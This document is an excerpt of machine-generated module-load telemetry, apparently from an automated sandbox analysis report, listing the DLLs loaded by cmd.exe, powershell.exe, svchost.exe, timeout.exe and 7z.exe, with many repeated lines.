          Source: C:\Windows\System32\cmd.exeSection loaded: ieframe.dllJump to behavior
          Source: C:\Windows\System32\cmd.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Windows\System32\cmd.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\cmd.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\cmd.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\cmd.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\cmd.exeSection loaded: mlang.dllJump to behavior
          Source: C:\Windows\System32\cmd.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
          Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
          Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
          Source: C:\Program Files\7-Zip\7z.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\timeout.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
